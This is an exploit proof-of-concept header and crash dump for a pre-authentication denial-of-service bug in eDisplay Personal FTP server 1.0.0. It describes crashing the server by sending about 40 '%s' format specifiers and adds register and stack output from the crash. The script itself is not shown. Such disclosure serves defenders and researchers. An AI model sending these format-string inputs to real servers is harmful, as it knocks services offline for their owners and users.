1 # Title: eDisplay Personal FTP server 1.0.0 Pre−Authentication DoS (PoC)
2 # From: The eh?−Team || The Great White Fuzz (we’re not sure yet)
3 # Found by: loneferret
4 # Hat’s off to dookie2000ca
5 # Disvovery date: 16/03/2010
6 # Software link: http://edisplay−personal−ftp−server.software.informer.com/
7 # Tested on: Windows XP SP3 Professional
8 # Nod to the Exploit−DB Team
9
10 # Vendor informed via email : 17/03/2010
11
12 #!/usr/bin/python
13
14 #Pre−Authentication crash #1
15 #I say crash number 1 since there’s another instance where it crashes with the USER command.
16 #Also many post−authentication commands also crash with the same buffer type (%n for example)
17 #with variant degrees of interesting CPU registry overwrites.
18 #It will crash if you send it about 40 ’%s’ really, but I’ve included my full session of 810 bytes sent.
19 #As always, if anyone wants to take this further go right ahead. Just be nice and don’t forget who found it.
20
21 #CONTEXT DUMP
22 # EIP: 7e4287aa mov dl,[eax]
23 # EAX: 73736150 (1936941392) −> N/A
24 # EBX: 0000000a ( 10) −> N/A
25 # ECX: 73736150 (1936941392) −> N/A
26 # EDX: 00000000 ( 0) −> N/A
27 # EDI: 0012c9a6 ( 1231270) −> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
28 # ESI: 73736151 (1936941393) −> N/A
29 # EBP: 0012c8e4 ( 1231076) −> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source,
30 #
and whether this process is started automatically
31 #
or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
32 # ESP: 0012c89c ( 1231004) −> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop sou
rce, and whether this process is started automatically or under programmatic (stack)
33 # +00: 0139b8d0 ( 20560080) −> PWSOCK32.DLL (heap)
34 # +04: 77124880 (1997686912) −> N/A
35 # +08: 000000cd ( 205) −> N/A
36 # +0c: 00000000 ( 0) −> N/A
37 # +10: ffffffff (4294967295) −> N/A
38 # +14: 00000000 ( 0) −> N/A
39
40 #disasm around:
41 #
0x7e428794 push eax